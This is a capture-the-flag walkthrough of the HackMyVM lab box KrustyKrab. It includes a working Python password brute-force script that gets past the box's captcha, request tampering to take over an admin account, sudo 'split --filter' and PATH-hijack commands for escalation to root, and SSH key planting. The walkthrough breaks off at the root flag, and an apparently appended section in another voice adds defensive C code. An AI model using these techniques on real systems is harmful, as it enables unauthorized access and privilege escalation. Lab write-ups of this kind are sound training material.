HackMyVM-KrustyKrab-Walkthrough
城南花已开

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.129 08:00:27:49:f7:6d PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f0:6f:4b VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.070 seconds (123.67 hosts/sec). 4 responded
~/temp
export ip=192.168.60.129
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.129:22
Open 192.168.60.129:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 08:27 CST
Initiating ARP Ping Scan at 08:27
Scanning 192.168.60.129 [1 port]
Completed ARP Ping Scan at 08:27, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:27
Completed Parallel DNS resolution of 1 host. at 08:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:27
Scanning 192.168.60.129 [2 ports]
Discovered open port 80/tcp on 192.168.60.129
Discovered open port 22/tcp on 192.168.60.129
Completed SYN Stealth Scan at 08:27, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.129
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-04-01 08:27:53 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:49:F7:6D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Fetching the page with curl shows that the HTML source contains a comment:

❯ curl $ip

…… (omitted)
</p>
<!--/var/www/html/finexo -->

Brute-forcing the login form

The comment reveals a new directory, finexo.

Visiting it shows a login form, login.php.

Enumeration shows that the user SpongeBob exists:

other usernames get a "user does not exist" message, while only this one gets a "wrong password" response.

In addition, the end of particles.min.js contains JSFuck-encoded code.

Decoding it yields the source of the captcha generator:

function generateCaptcha() {
    $characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
    $code = "";
    $seed = time();
    mt_srand($seed);
    for ($i = 0; $i < 4; $i++) {
        $code .= $characters[mt_rand(0, strlen($characters) - 1)];
    }
    $_SESSION['captcha'] = strtolower($code);
    return $code;
}

The captcha is seeded from the Unix timestamp: every request produces a different code, but anyone who can predict the server's clock can reproduce the same code, so this "random" value is predictable.

You will also notice that loading login.php triggers a second request to login.php?action=generateCaptcha,

which returns the letters from the captcha image directly as text.

So the brute force only needs to fetch that value and submit it with every attempt.

Here is the author's script, which I modified slightly to handle character-encoding issues

and to lowercase the captcha, because I am using the first release of the box and the author probably forgot to change that.

import requests

captcha_url = 'http://192.168.60.129/finexo/login.php?action=generateCaptcha'
login_url = 'http://192.168.60.129/finexo/login.php'

# Create a session object so the captcha and the login share the same PHP session
session = requests.Session()

cnt = 0
with open('/usr/share/wordlists/rockyou.txt', 'r', encoding="utf-8", errors="ignore") as f:
    for password in f.readlines():

        # Fetch the current captcha value (served as plain text)
        captcha = session.get(captcha_url).text.strip().lower()

        password = password.strip()  # strip whitespace around the password

        data = {
            'username': 'spongebob',
            'password': f'{password}',
            'captcha': captcha
        }

        # Send the login POST through the same session
        try_login = session.post(login_url, data=data)
        cnt += 1
        # Print the attempt
        print(f"Attempting with password: {password} {cnt}")

        # Check whether login succeeded, assuming the response contains a success marker
        if "successful" in try_login.text:
            print(f"Login successful with password: {password}")
            break

Running the script yields the password squarepants:

❯ python3 brute.py

Login successful with password: squarepants

Broken access control

Log in with the recovered credentials.

Many elements on the page are just anchor links.

The mail section reveals information about other users.

There is also an Edit Profile link.

It allows changing this user's password.

Intercepting the request shows a POST to update_profile.php that carries the username, password and other fields.

Change the username field to Administratro and resend the request.

I find the browser devtools more convenient for this.

Logging in as that user exposes an additional command-execution feature.

User privilege escalation

Listen on a port and catch the connection.

The www-data user has a sudo entry:

❯ pwncat-cs -lp 4444
[09:26:48] Welcome to pwncat 🐈! __main__.py:164
[09:26:50] received connection from 192.168.60.129:41212 bind.py:84
[09:26:50] 192.168.60.129:41212: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -l
Matching Defaults entries for www-data on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on KrustyKrab:
(KrustyKrab) NOPASSWD: /usr/bin/split

Use split in the usual way to escalate to the KrustyKrab user.

Normally there is no output echo, which makes this shell awkward to work in.

(remote) www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -u KrustyKrab /usr/bin/split --filter=/bin/sh /dev/stdin

id
uid=1000(KrustyKrab) gid=1000(debian) groups=1000(debian),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth),1002(krustygroup)

Add an SSH key to authorized_keys in the user's home directory:

mkdir -p ~/.ssh
echo "ssh-rsa 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 Pepster@primary">~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Connect over SSH:

❯ ssh KrustyKrab@$ip -i ../.ssh/id_rsa
The authenticity of host '192.168.60.129 (192.168.60.129)' can't be established.
ED25519 key fingerprint is SHA256:0d4MWSfQ+tUZ0f4j8Wea2uYelBzzcaj0CI4NtYQIx0E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.129' (ED25519) to the list of known hosts.
Linux KrustyKrab 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 27 08:25:58 2025 from 192.168.56.118
KrustyKrab@KrustyKrab:~$ cat user.txt
dcc8b0c111c9fa1522c7abfac8d1864b

The home directory also contains a hint file, help:

KrustyKrab@KrustyKrab:~$ file help
help: GIF image data, version 89a, 480 x 270

Copy it locally with scp and open it:

❯ scp -i ../.ssh/id_rsa KrustyKrab@$ip:~/help .
help 100% 2857KB 26.3MB/s 00:00
mv help help.gif

The user also has a sudo entry; let's analyze ttteeesssttt:

KrustyKrab@KrustyKrab:~$ sudo -l
Matching Defaults entries for KrustyKrab on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User KrustyKrab may run the following commands on KrustyKrab:
(spongeBob) NOPASSWD: /usr/bin/ttteeesssttt
KrustyKrab@KrustyKrab:~$ ls -al /usr/bin/ttteeesssttt
-rwxr-xr-x 1 root root 16560 Mar 27 08:07 /usr/bin/ttteeesssttt
KrustyKrab@KrustyKrab:~$ strings /usr/bin/ttteeesssttt
/lib64/ld-linux-x86-64.so.2
puts
system
time
strlen
getchar
__libc_start_main
srand
__cxa_finalize
printf
__isoc99_scanf
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
<J~
Bottom bun
Patty
Lettuce
Cheese
Onion
Tomato
Ketchup
Mustard
Pickles
Top bun
ABCDEFGHIJ
Spongebob forgot how to make Krabby Patty, You need to help him!
Current shuffled recipe order:
%c: %s
Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J):
%10s
Error: You must enter exactly 10 letters!
Error: Contains invalid characters! Use only A-J.
Validation successful! Perfect Krabby Patty!
Validation failed! This is not the correct recipe!
/bin/bash -p
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
labels
shuffle
_edata
_fini
strlen@GLIBC_2.2.5
system@GLIBC_2.2.5
printf@GLIBC_2.2.5
srand@GLIBC_2.2.5
__data_start
getchar@GLIBC_2.2.5
__gmon_start__
__dso_handle
ingredients
_IO_stdin_used
time@GLIBC_2.2.5
_end
__bss_start
main
__isoc99_scanf@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

Run the program and enter the ingredients in the order shown in the gif:

KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt

Spongebob forgot how to make Krabby Patty, You need to help him!

Current shuffled recipe order:
A: Lettuce
B: Onion
C: Pickles
D: Ketchup
E: Mustard
F: Patty
G: Cheese
H: Tomato
I: Top bun
J: Bottom bun
Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J): JFAGBHDECI

Validation successful! Perfect Krabby Patty!
spongebob@KrustyKrab:/home/KrustyKrab$

Now running as spongebob, there is a new hint.

It says Squidward is waiting for you.

The secret is the md5 of key1 and key2 concatenated,

where key2 is md5(key2.jpeg):

spongebob@KrustyKrab:~$ ls -al
total 56
drwx------ 2 spongebob spongebob 4096 Mar 27 05:16 .
drwxr-xr-x 6 root root 4096 Mar 27 02:30 ..
-rw------- 1 spongebob spongebob 58 Mar 27 08:23 .bash_history
-rw-r--r-- 1 spongebob spongebob 220 Mar 26 20:14 .bash_logout
-rw-r--r-- 1 spongebob spongebob 3526 Mar 26 20:14 .bashrc
-rw-r--r-- 1 root root 33 Mar 27 02:37 key1
-rw-r--r-- 1 root root 19259 Mar 27 02:32 key2.jpeg
-rw------- 1 spongebob spongebob 113 Mar 27 05:16 .mysql_history
-rw-r--r-- 1 root root 97 Mar 27 02:41 note.txt
-rw-r--r-- 1 spongebob spongebob 807 Mar 26 20:14 .profile
spongebob@KrustyKrab:~$ cat note.txt

Squidward is waiting for you!!!!

password is md5($key1$key2).

It's not so hard as you think.

spongebob@KrustyKrab:~$ cat key1
e1964798cfe86e914af895f8d0291812
spongebob@KrustyKrab:~$ md5sum key2.jpeg
5e1d0c1a168dc2d70004c2b00ba314ae key2.jpeg
spongebob@KrustyKrab:~$ echo -n "e1964798cfe86e914af895f8d02918125e1d0c1a168dc2d70004c2b00ba314ae" |md5sum
7ac254848d6e4556b73398dde2e4ef82 -

Root privilege escalation

Switch to the Squidward user:

spongebob@KrustyKrab:~$ su Squidward
Password:
$ bash
Squidward@KrustyKrab:/home/spongebob$

The home directory contains a SUID file.

Analyzing it shows that it simply runs cat /etc/shadow:

Squidward@KrustyKrab:~$ ls -la
total 40
drwx------ 3 Squidward Squidward 4096 Mar 27 08:20 .
drwxr-xr-x 6 root root 4096 Mar 27 02:30 ..
-rw------- 1 Squidward Squidward 0 Mar 27 08:23 .bash_history
-rw-r--r-- 1 Squidward Squidward 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 Squidward Squidward 3526 Apr 23 2023 .bashrc
-rwsr-xr-x 1 root root 16056 Mar 27 05:12 laststep
drwxr-xr-x 3 Squidward Squidward 4096 Mar 27 08:17 .local
-rw-r--r-- 1 Squidward Squidward 807 Apr 23 2023 .profile
Squidward@KrustyKrab:~$ file laststep
laststep: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b84dc5079c77a9f2f2d82492f95a9c110ec51c87, for GNU/Linux 3.2.0, not stripped
Squidward@KrustyKrab:~$ strings laststep
/lib64/ld-linux-x86-64.so.2
setgid
setuid
system
__libc_start_main
__cxa_finalize
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
cat /etc/shadow
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
system@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
setgid@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

and since the command is not an absolute path, it is open to PATH hijacking:

Squidward@KrustyKrab:~$ echo bash > cat
Squidward@KrustyKrab:~$ chmod +x cat
Squidward@KrustyKrab:~$ PATH=.:$PATH
Squidward@KrustyKrab:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Squidward@KrustyKrab:~$ ./
cat laststep .local/
Squidward@KrustyKrab:~$ ./laststep
root@KrustyKrab:~# whoami
root
root@KrustyKrab:~# cat /root/root.txt
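The PATH lookup behind the hijack above, as an added example that is neither the box's binary nor the walkthrough author's code: the vulnerable system() call beside a hardened execve version, plus a self-check that builds a scratch directory under /tmp (an assumption) holding an executable named cat and confirms that a PATH listing it first resolves to the scratch copy. Function names are my own.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
/* Resolve `cmd` against a PATH string the way /bin/sh does for system():
 * the first directory holding an executable of that name wins. Empty PATH
 * entries (which sh treats as the current directory) are skipped by strtok. */
int find_in_path(const char *cmd, const char *path, char *out, size_t outlen) {
    char buf[4096];
    snprintf(buf, sizeof buf, "%s", path);
    for (char *dir = strtok(buf, ":"); dir; dir = strtok(NULL, ":")) {
        snprintf(out, outlen, "%s/%s", dir, cmd);
        if (access(out, X_OK) == 0) return 1;
    }
    return 0;
}
/* Vulnerable pattern, matching what `strings laststep` showed: the shell that
 * system() starts inherits the caller's PATH, so the first "cat" in it runs
 * with the binary's SUID privileges. */
int vulnerable_laststep(void) { return system("cat /etc/shadow"); }
/* Hardened pattern: no shell, absolute path, and a fixed environment, so
 * neither PATH nor LD_* variables inherited from the caller matter. */
int hardened_laststep(void) {
    char *const argv[] = {"/bin/cat", "/etc/shadow", NULL};
    char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
    execve("/bin/cat", argv, envp);
    return -1; /* reached only if execve itself failed */
}
/* Self-check (assumed helper): create a scratch directory with an executable
 * named "cat", put it first in a constructed PATH like the PATH=.:$PATH step
 * above, and report whether the lookup picks the scratch copy. */
int shadowed_cat_wins(void) {
    char tmpl[] = "/tmp/pathdemoXXXXXX", fake[4200], path[4300], found[4400];
    char *dir = mkdtemp(tmpl);
    if (!dir) return -1;
    snprintf(fake, sizeof fake, "%s/cat", dir);
    FILE *f = fopen(fake, "w");
    if (!f) return -1;
    fputs("#!/bin/sh\necho scratch cat\n", f); /* harmless stand-in binary */
    fclose(f);
    chmod(fake, 0755);
    snprintf(path, sizeof path, "%s:/usr/bin:/bin", dir);
    int hit = find_in_path("cat", path, found, sizeof found) && strcmp(found, fake) == 0;
    unlink(fake);
    rmdir(dir);
    return hit;
}
```

The same check is what a reviewer should apply to any SUID helper: every command it runs must be an absolute path, or the program must reset PATH itself before calling out.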
